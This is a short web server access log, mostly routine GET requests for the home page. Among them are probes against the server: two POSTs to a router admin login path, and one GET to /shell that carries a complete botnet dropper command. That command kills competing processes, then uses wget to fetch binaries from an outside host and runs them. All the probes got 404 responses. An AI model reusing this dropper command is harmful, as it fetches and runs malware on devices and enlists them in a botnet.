[0mGET / [32m200[0m 10.727 ms - 31962[0m
[0mGET / [32m200[0m 11.020 ms - 31962[0m
[0mGET / [32m200[0m 12.348 ms - 31962[0m
[0mGET / [32m200[0m 11.817 ms - 31962[0m
[0mGET / [32m200[0m 10.539 ms - 31962[0m
[0mGET / [32m200[0m 11.418 ms - 31962[0m
[0mGET / [32m200[0m 11.742 ms - 31962[0m
[0mGET / [32m200[0m 10.585 ms - 31962[0m
[0mGET / [32m200[0m 10.538 ms - 31962[0m
[0mGET / [32m200[0m 12.139 ms - 31962[0m
[0mGET / [32m200[0m 12.101 ms - 31962[0m
[0mGET / [32m200[0m 10.610 ms - 31962[0m
[0mGET / [32m200[0m 12.111 ms - 31962[0m
[0mGET / [32m200[0m 12.347 ms - 31962[0m
[0mPOST /boaform/admin/formLogin [33m404[0m 4.046 ms - 163[0m
[0mGET / [32m200[0m 10.522 ms - 31962[0m
[0mGET / [32m200[0m 10.580 ms - 31962[0m
[0mPOST /boaform/admin/formLogin [33m404[0m 3.232 ms - 163[0m
[0mGET / [32m200[0m 10.575 ms - 31962[0m
[0mGET /shell?killall+-9+arm7;killall+-9+arm4;killall+-9+arm;killall+-9+/bin/sh;killall+-9+/bin/sh;killall+-9+/z/bin;killall+-9+/bin/bash;cd+/tmp;rm+vevhea4+ivwebcda7;wget+http:/\/dihvbe.theeyefirewall.su/ivwebcda7;chmod+777+ivwebcda7;./ivwebcda7+jaws;wget+http:/\/dihvbe.theeyefirewall.su/vevhea4;chmod+777+vevhea4;./vevhea4+jaws [33m404[0m 2.886 ms - 144[0m
[0mGET / [32m200[0m 12.021 ms - 31962[0m
[0mGET / [32m200[0m 12.271 ms - 31962[0m
[0mGET / [32m200[0m 11.904 ms - 31962[0m
[0mGET / [32m200[0m 10.537 ms - 31962[0m
[0mGET / [32m200[0m 12.874 ms - 31962[0m
[0mGET / [32m200[0m 12.478 ms - 31962[0m
[0mGET / [32m200[0m 11.626 ms - 31962[0m
[0mGET / [32m200[0m 10.546 ms - 31962[0m
[0mGET / [32m200[0m 12.011 ms - 31962[0m
